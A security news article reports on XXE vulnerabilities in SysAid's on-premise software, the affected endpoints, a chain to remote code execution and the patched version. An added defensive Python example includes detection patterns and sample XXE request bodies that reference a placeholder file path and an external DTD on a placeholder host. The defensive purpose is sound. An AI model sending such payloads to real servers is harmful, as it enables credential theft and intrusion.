Cybersecurity researchers have disclosed multiple SysAid IT support software vulnerabilities that could lead to pre-authenticated remote code execution with elevated privileges. The flaws, tracked as CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777, are all classified as XML External Entity (XXE) injections, which can be exploited when attackers manipulate an application’s parsing of XML input.
Exploiting XXE Vulnerabilities: Remote Code Execution Risk
The SysAid IT support software vulnerabilities occur when attackers are able to inject unsafe XML entities into the web application, allowing them to conduct Server-Side Request Forgery (SSRF) attacks. In the worst cases, this can escalate to remote code execution, posing a serious risk to affected systems.
According to researchers Sina Kheirkhah and Jake Knott from watchTowr Labs, the specific vulnerabilities are as follows:
- CVE-2025-2775 and CVE-2025-2776: XXE flaws within the /mdm/checkin endpoint
- CVE-2025-2777: XXE vulnerability within the /lshw endpoint
These vulnerabilities can be easily exploited by sending specially crafted HTTP POST requests to the affected endpoints. Once successfully exploited, attackers could retrieve sensitive information, including SysAid’s InitAccount.cmd file, which contains the administrator’s username and plaintext password created during installation.
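As an added illustration (not code from the article, SysAid or watchTowr), the Python below shows the defensive side of what is described above: a pre-parse guard that refuses any XML request body carrying a DTD, which is the generic XXE mitigation, and a scan over constructed request records for POSTs to the two endpoints named above that carry entity declarations. Only the endpoint paths come from the article; the function names, sample bodies and placeholder URLs are assumptions.

```python
import re
import xml.etree.ElementTree as ET

# Endpoints named in the write-up; matched by path prefix.
WATCHED_PATHS = ("/mdm/checkin", "/lshw")

# A benign check-in or hardware-inventory payload never needs an inline DTD,
# so any DOCTYPE is suspicious; an ENTITY with a SYSTEM/PUBLIC identifier is
# the file-read/SSRF primitive itself, and a parameter entity (%) usually
# pulls in an external DTD.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
EXTERNAL_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
PARAMETER_ENTITY_RE = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)

def classify_xml_body(body: str) -> list:
    """Return the XXE indicators found in an XML request body (empty if clean)."""
    findings = []
    if DOCTYPE_RE.search(body):
        findings.append("doctype")
    if EXTERNAL_ENTITY_RE.search(body):
        findings.append("external-entity")
    if PARAMETER_ENTITY_RE.search(body):
        findings.append("parameter-entity")
    return findings

def parse_without_dtd(body: str) -> ET.Element:
    """Hardened parse: reject bodies with any DTD before the parser sees them."""
    if classify_xml_body(body):
        raise ValueError("DTD and entity declarations are not accepted here")
    return ET.fromstring(body)

def scan_requests(requests: list) -> list:
    """Return (path, findings) for POSTs to watched endpoints carrying XXE indicators."""
    hits = []
    for req in requests:
        if req["method"] != "POST" or not req["path"].startswith(WATCHED_PATHS):
            continue
        findings = classify_xml_body(req["body"])
        if findings:
            hits.append((req["path"], findings))
    return hits

# Constructed sample traffic (not real captures); paths and hosts are placeholders.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/mdm/checkin",
     "body": "<?xml version='1.0'?><checkin><udid>CONSTRUCTED-0001</udid></checkin>"},
    {"method": "POST", "path": "/mdm/checkin",
     "body": "<?xml version='1.0'?><!DOCTYPE c [<!ENTITY ext SYSTEM 'file:///PLACEHOLDER'>]>"
             "<checkin><udid>&ext;</udid></checkin>"},
    {"method": "POST", "path": "/lshw",
     "body": "<!DOCTYPE l [<!ENTITY % dtd SYSTEM 'http://PLACEHOLDER.example/x.dtd'> %dtd;]><lshw/>"},
    {"method": "GET", "path": "/lshw", "body": ""},
]
```

Running `scan_requests(SAMPLE_REQUESTS)` flags the second and third records and leaves the benign check-in and the GET untouched.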
Exploitation Chain and Remote Code Execution
Once attackers have gained access to the administrator credentials, they can escalate their privileges and potentially gain full control over the SysAid system. The XXE vulnerabilities can also be chained with a command injection vulnerability—CVE-2025-2778, discovered by a third party—allowing attackers to achieve remote code execution.
SysAid has addressed all four vulnerabilities in on-premise version 24.4.60 b16, released in early March 2025. A proof-of-concept (PoC) exploit demonstrating the chain of vulnerabilities has already been made available.
Given that previous SysAid vulnerabilities like CVE-2023-47246 were exploited by ransomware groups such as Cl0p in zero-day attacks, users are strongly urged to update their installations to the latest version to avoid exploitation.